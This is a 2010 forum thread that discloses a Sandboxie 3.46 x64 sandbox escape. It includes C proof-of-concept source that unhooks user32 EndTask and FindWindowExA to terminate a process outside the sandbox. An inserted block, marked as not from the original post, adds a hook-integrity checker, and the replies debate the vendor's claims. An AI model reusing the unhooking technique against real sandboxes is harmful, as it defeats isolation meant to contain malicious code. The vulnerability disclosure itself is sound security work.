breakout sandboxie 3.46 x64


breakout sandboxie 3.46 x64

Post by mj0011 on 29/7/2010, 17:39

by Google Translate
==================================

Looking at the update statement of the official Sandboxie 3.46 release, Sandboxie shamelessly and boastfully claimed to have perfect support for the x64 operating system, so that users of a 64-bit operating system can get the same security as users of a 32-bit operating system:

"Improved support for 32-bit and 64-bit Windows Vista and Windows 7. Support for 64-bit Windows should now be on par with 32-bit Windows"

Making a complete kernel-level defense work perfectly on x64 in commercial software is a very difficult issue, and at first I could not help but praise Sandboxie for it.

After the praise I began to test whether it can really support defense on x64. After testing I discovered that this is not the case: Sandboxie simply cannot provide protection on 64-bit equal to that on 32-bit. On 64-bit, a lot of Sandboxie's defenses are missing or can easily be bypassed, while the same defenses on 32-bit are not affected.

To give a simple example: on 32-bit operating systems, for terminating a process via EndTask, Sandboxie implements protection by hooking NtRequestWaitReplyPort to intercept the RPC communication with csrss and block the termination of the process, but on 64-bit operating systems it only uses a ring3 API hook on EndTask to implement UI isolation.

Clearly a program isolated in the sandbox can easily break this useless protection, penetrate the sandbox, and destroy processes outside the sandbox or steal information from processes outside the sandbox.

Attached is a test program, which needs to run on a Win7 x64 Simplified Chinese operating system (because the window name etc. are hard-coded). This program, when started inside the sandbox on x64, can penetrate the sandbox and terminate the calculator program outside the sandbox.
Test method: start the calculator first, then run endtask.exe sandboxed; the calculator is instantly terminated.

POC test program source code:

#include "stdafx.h"
#include <stdio.h>
#define WINNT 1
#include "windows.h"
#include "winuser.h"

int _tmain(int argc, _TCHAR* argv[])
{
    // Entry points of the two user32 APIs that the sandbox hooks in ring3
    PVOID pAddr  = GetProcAddress(GetModuleHandleA("user32.dll"), "EndTask");
    PVOID pAddr2 = GetProcAddress(GetModuleHandleA("user32.dll"), "FindWindowExA");
    if (pAddr == NULL || pAddr2 == NULL)
    {
        printf("cannot resolve user32 exports\n");
        return 1;
    }

    DWORD oldp;

    // Write the original first 5 bytes of the x64 prologue back over the
    // entry of EndTask, which removes the user-mode hook placed there
    VirtualProtect(pAddr, 0x5, PAGE_READWRITE, &oldp);
    *(BYTE*)pAddr = 0x48;
    *(DWORD*)((ULONGLONG)pAddr + 0x1) = 0x08245c89;
    VirtualProtect(pAddr, 0x5, oldp, &oldp);

    // Same for FindWindowExA
    VirtualProtect(pAddr2, 0x5, PAGE_READWRITE, &oldp);
    *(BYTE*)pAddr2 = 0x48;
    *(DWORD*)((ULONGLONG)pAddr2 + 0x1) = 0x8338ec83;
    VirtualProtect(pAddr2, 0x5, oldp, &oldp);

    // With the hooks gone, the sandboxed process can find and end the
    // calculator window outside the sandbox (window title is hard-coded)
    HWND h = FindWindowExA(0, 0, 0, "Calculator");
    if (h == 0)
    {
        printf("cannot find calc\n");
        return 1;
    }

    EndTask(h, TRUE, TRUE);
    return 0;
}

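As an added defender-side example (not code from the original post or from Sandboxie), this models the integrity check a sandbox monitor would need to run, from outside the sandboxed process, to notice that its user-mode hooks on user32!EndTask and user32!FindWindowExA have been written back to the original prologue bytes, as the PoC above does. The jmp-stub hook bytes and API names are assumed placeholders; the original prologue bytes are the ones the PoC writes.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PATCH_LEN 5   /* the PoC above overwrites 5 bytes at each API entry */
enum hook_state { HOOK_INTACT, HOOK_RESTORED, HOOK_TAMPERED };

/* One user-mode inline hook the sandbox monitor installed and must verify later. */
struct hooked_api {
    const char *name;
    uint8_t hook[PATCH_LEN];      /* bytes the monitor wrote (assumed jmp rel32 stub) */
    uint8_t original[PATCH_LEN];  /* prologue bytes it saved before patching */
};

/* Classify the live entry bytes against what was written and what was saved. */
enum hook_state check_hook(const struct hooked_api *api, const uint8_t *live)
{
    if (memcmp(live, api->hook, PATCH_LEN) == 0)     return HOOK_INTACT;
    if (memcmp(live, api->original, PATCH_LEN) == 0) return HOOK_RESTORED;
    return HOOK_TAMPERED;
}

/* Verify every hook; report each one that is gone and return how many. */
int count_unhooked(const struct hooked_api *apis, const uint8_t (*live)[PATCH_LEN], size_t n)
{
    int bad = 0;
    for (size_t i = 0; i < n; i++) {
        enum hook_state s = check_hook(&apis[i], live[i]);
        if (s == HOOK_INTACT) continue;
        printf("%s: hook %s\n", apis[i].name,
               s == HOOK_RESTORED ? "restored to original prologue" : "overwritten with unknown bytes");
        bad++;
    }
    return bad;
}

/* Constructed scenario: hooks were installed, then the PoC above ran inside the
   sandbox and wrote the original prologue bytes back over both entries. */
int demo_after_poc(void)
{
    static const struct hooked_api apis[2] = {
        { "user32!EndTask",       {0xE9, 0x11, 0x22, 0x33, 0x44}, {0x48, 0x89, 0x5C, 0x24, 0x08} },
        { "user32!FindWindowExA", {0xE9, 0x55, 0x66, 0x77, 0x88}, {0x48, 0x83, 0xEC, 0x38, 0x83} },
    };
    static const uint8_t live[2][PATCH_LEN] = {   /* memory after the PoC's writes */
        {0x48, 0x89, 0x5C, 0x24, 0x08}, {0x48, 0x83, 0xEC, 0x38, 0x83} };
    return count_unhooked(apis, live, 2);   /* 2: both hooks are gone */
}

int main(void) { return demo_after_poc() == 2 ? 0 : 1; }
```

Such a check is only meaningful when run from outside the process (the driver or a supervising process), because the sandboxed process can rewrite a checker in its own address space as easily as it rewrote the hook; that is the gap the post contrasts with the 32-bit build's interception of the csrss request.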

Re: breakout sandboxie 3.46 x64

Post by ssj100 on 29/7/2010, 17:57

Wow, thanks for that mj0011 - I'll forward that to tzuk and see what he thinks. However, let me correct/clarify a few non-technical things about Sandboxie 64-bit.

Essentially (keeping in mind that I'm replying to a piece of automatically translated text), I think you have mis-interpreted this statement:
"Support for 64-bit Windows should now be on par with 32-bit Windows"
I was wondering about what this meant exactly too, and I got it clarified here:
http://www.sandboxie.com/phpbb/viewtopic.php?p=54417#54417

As you can see, tzuk's reply is fairly clear:
I was referring to the many, many problems reported about getting stuff to install or run properly under 64-bit Sandboxie, where the same stuff would work perfectly under 32-bit Sandboxie.
In no way does he claim that 64-bit Sandboxie is as strong against malware as 32-bit Sandboxie. Basically tzuk is referring to technical support when he states that 64-bit Sandboxie is on par with 32-bit - he is not referring to the strength of the program to perform containment/isolation.

In fact, tzuk has already admitted many times over that 64-bit Sandboxie is not as strong as 32-bit Sandboxie. It's even officially documented here:
http://www.sandboxie.com/index.php?NotesAbout64BitEdition

The 64-bit edition of Sandboxie provides a reduced level of protection compared to the 32-bit edition of Sandboxie.

_________________
Sandboxie + LUA + SRP + DEP + SuRun
Windows Firewall + NAT Router + IPSec (on-demand)
VirtualBox (on-demand)
Drive SnapShot (on-demand)

Re: breakout sandboxie 3.46 x64

Post by ssj100 on 29/7/2010, 18:49

tzuk replies here:
http://www.sandboxie.com/phpbb/viewtopic.php?p=56358#56358


Re: breakout sandboxie 3.46 x64

Post by Guest on 30/7/2010, 01:29

Admin note
Please, in future address your comments and questions to the developer before throwing insults around here. This forum is not a "free for all" for people to insult or disparage active developers.



Re: breakout sandboxie 3.46 x64

Post by ssj100 on 30/7/2010, 03:24

Good point patrick. I'm giving him the benefit of the doubt (because we're reading automatically translated text, and may miss the context etc.). However, it does read like a fairly blatant insult.


Re: breakout sandboxie 3.46 x64

Post by Guest on 30/7/2010, 04:34

Yes, sometimes those translations are strange. :) But it seemed unnecessarily aggressive.



Re: breakout sandboxie 3.46 x64

Post by blah1234 on 9/2/2011, 10:27

Didn't MS provide APIs to security companies to access the kernel back in 2006? Whatever happened to that?
http://www.fiercecio.com/story/microsoft-debuts-draft-patchguard-workarounds/2006-12-20

